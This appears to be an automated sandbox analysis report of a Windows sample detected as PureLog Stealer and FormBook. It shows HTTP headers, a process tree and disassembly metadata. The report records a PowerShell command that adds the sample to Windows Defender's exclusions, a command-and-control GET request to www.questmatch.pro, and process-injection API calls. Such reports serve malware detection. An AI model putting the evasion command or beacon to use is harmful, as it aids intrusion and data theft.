                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: c25717e3-50e4-47e0-8071-34b463c7683e
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSn3uad%2FBbJHBwaDLAP8Y78GModmqaOLmTK7WVfnSIqlTH24PQE%2F9ruBYtVC%2FvgZ4vqQbzVqfmZYgDImT3Tfw0TaTbPbKDrCd7H4n%2B8x03HRklYX%2BS3NAN%2BuD0sOwWxndcFFcho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e8e003c6e2041ad-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1542&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1649&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  48 | 192.168.2.5 | 50029 | 172.67.138.37 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:57.172549009 CET | 360 | OUT | GET /z3ox/?lH_L4=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhVmfI//tpSvw7xSsa4vbhkQtFrYKlL+/JsA82eJgn+fnUtQ==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


                                                                                  Target ID:0
                                                                                  Start time:19:24:48
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Users\user\Desktop\W3MzrFzSF0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\W3MzrFzSF0.exe"
                                                                                  Imagebase:0x920000
                                                                                  File size:795'136 bytes
                                                                                  MD5 hash:44AE4C9C2AB6623C0C1D04BB8B81871E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:19:24:49
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                                                                                  Imagebase:0xed0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:19:24:49
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:19:24:52
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff6ef0c0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:19:24:53
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                  Imagebase:0x10000
                                                                                  File size:2'625'616 bytes
                                                                                  MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:19:24:55
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe"
                                                                                  Imagebase:0x7e0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:19:24:57
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                  Imagebase:0x20000
                                                                                  File size:135'680 bytes
                                                                                  MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:10
                                                                                  Start time:19:25:13
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe"
                                                                                  Imagebase:0x7e0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4469698131.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:11
                                                                                  Start time:19:25:24
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff79f9e0000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true


                                                                                    Execution Graph

                                                                                    Execution Coverage:11.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:3.7%
                                                                                    Total number of Nodes:460
                                                                                    Total number of Limit Nodes:32

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hgq$Hgq
                                                                                    • API String ID: 0-3391890871
                                                                                    • Opcode ID: 88beb33c3cbd8016b7b4bec39d52d0c4c319a61e1a9ec6c298e13b73b4d2cd8a
                                                                                    • Instruction ID: 48a92becd1e5595401189241bf7779fe001827609a7ea98de72653a50c901c71
                                                                                    • Opcode Fuzzy Hash: 88beb33c3cbd8016b7b4bec39d52d0c4c319a61e1a9ec6c298e13b73b4d2cd8a
                                                                                    • Instruction Fuzzy Hash: 44226D70B402198FDB54EFB9C4946AEBBF2AF89340F248569D505EB391DF34AD42CB50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRcq
                                                                                    • API String ID: 0-4134321033
                                                                                    • Opcode ID: d1693ad7b7d4b3ae90ea819731aae24c009f8e768a55a952fff7d9a9d166cda3
                                                                                    • Instruction ID: 2e44b55f53e2667475b858e3c81df2801f308e51843fea6b73f68891a54ed1c6
                                                                                    • Opcode Fuzzy Hash: d1693ad7b7d4b3ae90ea819731aae24c009f8e768a55a952fff7d9a9d166cda3
                                                                                    • Instruction Fuzzy Hash: 06321B74B002198FDB58DB28C858BEE77B6AF88700F1485A8D50D9B3A5DF745D82CF91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4'cq
                                                                                    • API String ID: 0-182294849
                                                                                    • Opcode ID: 726800e940e812bb57feae72cb11f4d7400cd87b8512adf1cd9fbbd581333711
                                                                                    • Instruction ID: d2739f8e034f3a3e26c8d6d486eac88b5a2d6d51ef986f0b3f1bf04b337d93e5
                                                                                    • Opcode Fuzzy Hash: 726800e940e812bb57feae72cb11f4d7400cd87b8512adf1cd9fbbd581333711
                                                                                    • Instruction Fuzzy Hash: 23421674B002188FDB18DB68C999BE9B7F2FF89700F1541E9D909AB361CA31AD81CF51

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2071342526.00000000076C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Hgq
                                                                                    • API String ID: 0-2103768809
                                                                                    • Opcode ID: d0f6f2a449a31be67be39cd2e3211cdfcf04f69a1ed8e0b00bd079022eb2faa4
                                                                                    • Instruction ID: 56268a60097156175f4699a24dc8229f5ca477ec13cacc85a9c493d8cf4d091b
                                                                                    • Opcode Fuzzy Hash: d0f6f2a449a31be67be39cd2e3211cdfcf04f69a1ed8e0b00bd079022eb2faa4
                                                                                    • Instruction Fuzzy Hash: 50E19BB17016118FDB29EB79C8607AE77F6AF89640F24456DD1478B391CF34E902CBA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID: 0-3916222277
                                                                                    • Opcode ID: a5f4376489712bf9f2f84e3ce57d7658999d8bb3b7300228d492420b0779863f
                                                                                    • Instruction ID: 86d75a134aa6988b80bcb6b6cd59082d81fded3493ef77614a8f930fcb49d7a3
                                                                                    • Opcode Fuzzy Hash: a5f4376489712bf9f2f84e3ce57d7658999d8bb3b7300228d492420b0779863f
                                                                                    • Instruction Fuzzy Hash: EB026F35E00329DFEB14EB68C894BEDB7B6AF94200F508699D409B7291EF705E85CF51
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: {
                                                                                    • API String ID: 0-366298937
                                                                                    • Opcode ID: 339ae5e9907df4003640971a92ff92d2cf344b991a8d329f0b178e600354bd5b
                                                                                    • Instruction ID: 59a0c3c9d6c9155194671e925989e414c72715ade431b8a20dad1be275432cc6
                                                                                    • Opcode Fuzzy Hash: 339ae5e9907df4003640971a92ff92d2cf344b991a8d329f0b178e600354bd5b
                                                                                    • Instruction Fuzzy Hash: E4710474D10219CBDB14DFA9C4945EEBBF2BF88301F14C26AE419AB355D7709942CF94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 08fa64c3681d8167aa0f50bebdee9e2c71c3c46cae230ea92629f7fccbd5dd24
                                                                                    • Instruction ID: 63198b3c769bfae4a02742737e3e7831f04a21f9a73340db0d7c9157695204cd
                                                                                    • Opcode Fuzzy Hash: 08fa64c3681d8167aa0f50bebdee9e2c71c3c46cae230ea92629f7fccbd5dd24
                                                                                    • Instruction Fuzzy Hash: AD522C76910619CFCB25DF65C854AE9BBB1FF49300F14C6E9E409AB261EB71EA81CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 556eaf7f1f6055a08be59f9e945953962be0acded8576fba465c2b06efb2d978
                                                                                    • Instruction ID: 35aab3537dca3058791799c4969a281d6413816f1438f98dc1be84e680a394e5
                                                                                    • Opcode Fuzzy Hash: 556eaf7f1f6055a08be59f9e945953962be0acded8576fba465c2b06efb2d978
                                                                                    • Instruction Fuzzy Hash: 9D32187690061ACFCB25DF64C984BD9B7B2FF89300F1485E9E509AB261DB71EA85CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072603751.000000000BFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BFA0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_bfa0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: cb7994e39f8e365026aee0bd0a9914574da28364ffe3fa0fb7bc49ccd582b464
                                                                                    • Instruction ID: 6e2463a03ce10007f4187c4607a9824c9330eda33b68db18e1047e4d692814bf
                                                                                    • Opcode Fuzzy Hash: cb7994e39f8e365026aee0bd0a9914574da28364ffe3fa0fb7bc49ccd582b464
                                                                                    • Instruction Fuzzy Hash: 94F15C72E00209CFDB18DFA9C944B9DBBF2FF89704F168558E405AB295DB74EA45CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ba5dfd93edd7fb3ff452766308e6d927bbe3ca3b07aca963d7c4a53e0469757f
                                                                                    • Instruction ID: d5d2e65ac541bf03593c7c3762b211e646faf78fe35850cace4ba1d7afd5dbc4
                                                                                    • Opcode Fuzzy Hash: ba5dfd93edd7fb3ff452766308e6d927bbe3ca3b07aca963d7c4a53e0469757f
                                                                                    • Instruction Fuzzy Hash: 25D13E74E50209CFDB25DFB9C594A9DBBF2BF89344F248269E505AB391DB30A991CF00
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0f5b6d61299fcafcf9aee380f933147cf714133281e7c8bf520f2f36e11e453a
                                                                                    • Instruction ID: 7d2b6ca3ea2f1c0b0ba5425dd737af0f5ce76fef29f12932f800ac2712363d56
                                                                                    • Opcode Fuzzy Hash: 0f5b6d61299fcafcf9aee380f933147cf714133281e7c8bf520f2f36e11e453a
                                                                                    • Instruction Fuzzy Hash: 89A16F32E0021ACFCF05DFB9C8545AEBBB6FF84304B15456AE905EB265DB31E916CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: deaacfaccbb471840b164a50010a0029423a4c10745f10278c61f4ddbb1d3196
                                                                                    • Instruction ID: c76b260ec236d84d410719574ee377b31d07a3b9fd1c5ad920da432fbec9f8e9
                                                                                    • Opcode Fuzzy Hash: deaacfaccbb471840b164a50010a0029423a4c10745f10278c61f4ddbb1d3196
                                                                                    • Instruction Fuzzy Hash: 0451A6B4E012099FDB08DFA9C995AEEFBF2BF88300F148429D519AB364DB355942CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e95cdccd2ae80ce76ab653137f7e6fedb08f76e0a59d01d17c0322bf0bf40064
                                                                                    • Instruction ID: f49805f33d0efd4f17da277f1bf424b36faf5cb9d59573ebc3ce9e40b3f99c3a
                                                                                    • Opcode Fuzzy Hash: e95cdccd2ae80ce76ab653137f7e6fedb08f76e0a59d01d17c0322bf0bf40064
                                                                                    • Instruction Fuzzy Hash: D251A7B4E002099FDB08DFA9C955AEEFBF2BF88300F148429D509AB364DB355842CF50

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 058B8A6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 0d1637a5e6c6530145b2d99f3cd50ceadcfd9047d8b16993071e93d1bdfc856b
                                                                                    • Instruction ID: 67316b0221f08a3073af9ab6169935f7318a15a68ca5ef0900a3b5ce8933739e
                                                                                    • Opcode Fuzzy Hash: 0d1637a5e6c6530145b2d99f3cd50ceadcfd9047d8b16993071e93d1bdfc856b
                                                                                    • Instruction Fuzzy Hash: A3916AB1D002198FEF24CF68C845BEDBBB6BF48314F1481A9D819E7240DBB49985CF92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 058B8A6E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 1a6dc0d937275f07fff651c054f7bf444841fcb51e39c4eecbc443250d8c2e50
                                                                                    • Instruction ID: 0eca94b20741eda38253e1184d637983b3f1d898114b226ecd1f41c45e5eb175
                                                                                    • Opcode Fuzzy Hash: 1a6dc0d937275f07fff651c054f7bf444841fcb51e39c4eecbc443250d8c2e50
                                                                                    • Instruction Fuzzy Hash: 9E916C71D002199FEF24CF68C845BEDBBBABF48314F0481A9D819E7240DBB49985CF92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0139B41E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013959C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 013959C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2067637310.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1390000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 058BF676
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 0BE6CB25
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2072445624.000000000BE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BE60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_be60000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,052CF6DD,?,?), ref: 052CF78F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 058B8640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,052CF6DD,?,?), ref: 052CF78F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070032798.00000000052C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_52c0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 058B8640
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2070639285.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_W3MzrFzSF0.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0BFA1582,00000000,00000000,03D14128,02D308B0), ref: 0BFA19D0
                                                                                    Memory Dump Source
